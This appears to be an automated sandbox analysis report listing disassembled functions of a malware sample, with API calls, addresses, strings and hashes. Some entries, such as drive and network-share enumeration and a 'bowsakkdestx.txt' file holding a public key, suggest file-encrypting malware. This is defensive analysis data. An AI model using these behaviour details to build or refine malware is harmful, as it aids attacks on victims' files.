            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
            • String ID: bowsakkdestx.txt${"public_key":"
            • API String ID: 2805819797-1771568745
            • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
            • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
            • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
            • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __aulldvrm
            • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
            • API String ID: 1302938615-3129329331
            • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
            • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
            • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
            • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
            APIs
            • ___unDName.LIBCMT ref: 0043071B
            • _strlen.LIBCMT ref: 0043072E
            • __lock.LIBCMT ref: 0043074A
            • _malloc.LIBCMT ref: 0043075C
            • _malloc.LIBCMT ref: 0043076D
            • _free.LIBCMT ref: 004307B6
              • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
            • _free.LIBCMT ref: 004307AF
              • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
              • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
            • String ID:
            • API String ID: 3704956918-0
            • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
            • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
            • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
            • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
            APIs
            • timeGetTime.WINMM ref: 00411B1E
            • timeGetTime.WINMM ref: 00411B29
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
            • DispatchMessageW.USER32(?), ref: 00411B5C
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
            • Sleep.KERNEL32(00000064), ref: 00411B72
            • timeGetTime.WINMM ref: 00411B78
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: MessageTimetime$Peek$DispatchSleep
            • String ID:
            • API String ID: 3697694649-0
            • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
            • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
            • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
            • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
            APIs
            • __init_pointers.LIBCMT ref: 00425141
              • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
              • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
              • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
              • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
            • __mtinitlocks.LIBCMT ref: 00425146
            • __mtterm.LIBCMT ref: 0042514F
              • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
              • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
              • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
            • __calloc_crt.LIBCMT ref: 00425174
            • __initptd.LIBCMT ref: 00425196
            • GetCurrentThreadId.KERNEL32 ref: 0042519D
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
            • String ID:
            • API String ID: 3567560977-0
            • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
            • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
            • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
            • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
            APIs
            • __lock.LIBCMT ref: 0042594A
              • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
              • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
              • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
            • _free.LIBCMT ref: 00425970
              • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
              • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
            • __lock.LIBCMT ref: 00425989
            • ___removelocaleref.LIBCMT ref: 00425998
            • ___freetlocinfo.LIBCMT ref: 004259B1
            • _free.LIBCMT ref: 004259C4
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
            • String ID:
            • API String ID: 626533743-0
            • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
            • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
            • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
            • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
            APIs
            • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ___from_strstr_to_strchr
            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
            • API String ID: 601868998-2416195885
            • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
            • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
            • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
            • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: .\crypto\buffer\buffer.c$g9F
            • API String ID: 2102423945-3653307630
            • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
            • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
            • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
            • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
            APIs
            • __getptd_noexit.LIBCMT ref: 004C5D3D
              • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
              • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
              • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
              • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
              • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
            • __calloc_crt.LIBCMT ref: 004C5D60
            • __get_sys_err_msg.LIBCMT ref: 004C5D7E
            • __get_sys_err_msg.LIBCMT ref: 004C5DCD
            Strings
            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
            • API String ID: 3123740607-798102604
            • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
            • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _fprintf_memset
            • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
            • API String ID: 3021507156-3399676524
            • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
            • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
            • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
            • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
            APIs
            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Path$AppendFolder
            • String ID: bowsakkdestx.txt
            • API String ID: 29327785-2616962270
            • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
            • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
            • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
            • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
            APIs
            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
            • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
            • UpdateWindow.USER32(00000000), ref: 0041BAC5
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Window$CreateShowUpdate
            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
            • API String ID: 2944774295-3503800400
            • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
            • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
            • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
            • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
            APIs
            • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
            • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
            • _memset.LIBCMT ref: 00410C4C
            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Enum$AllocGlobalOpenResource_memset
            • String ID:
            • API String ID: 364255426-0
            • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
            • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
            • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
            • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
            APIs
            • __getenv_helper_nolock.LIBCMT ref: 00441726
            • _strlen.LIBCMT ref: 00441734
              • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
            • _strnlen.LIBCMT ref: 004417BF
            • __lock.LIBCMT ref: 004417D0
            • __getenv_helper_nolock.LIBCMT ref: 004417DB
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
            • String ID:
            • API String ID: 2168648987-0
            • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
            • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
            APIs
            • GetLogicalDrives.KERNEL32 ref: 00410A75
            • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
            • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
            • SetErrorMode.KERNEL32(00000000), ref: 00410B02
            • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
            • String ID:
            • API String ID: 2560635915-0
            • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
            • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
            • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
            • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
            APIs
            • _malloc.LIBCMT ref: 0043B70B
              • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
              • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
              • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00760000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
            • _free.LIBCMT ref: 0043B71E
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap_free_malloc
            • String ID:
            • API String ID: 1020059152-0
            • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
            • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
            • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
            • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
            APIs
            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
            • DispatchMessageW.USER32(?), ref: 0041F0B6
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
            • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
            • String ID:
            • API String ID: 1380987712-0
            • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
            • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
            • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
            • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
            APIs
            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
            • DispatchMessageW.USER32(?), ref: 0041E546
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
            • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
            • String ID:
            • API String ID: 1380987712-0
            • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
            • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
            • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
            • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
            APIs
            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
            • DispatchMessageW.USER32(?), ref: 0041FA7B
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
            • String ID:
            • API String ID: 1380987712-0
            • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
            • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
            • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
            • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
            APIs
            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
            • DispatchMessageW.USER32(?), ref: 0041FE2B
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
            • String ID:
            • API String ID: 1380987712-0
            • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
            • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
            • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
            • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
            APIs
            Strings
            Memory Dump Source
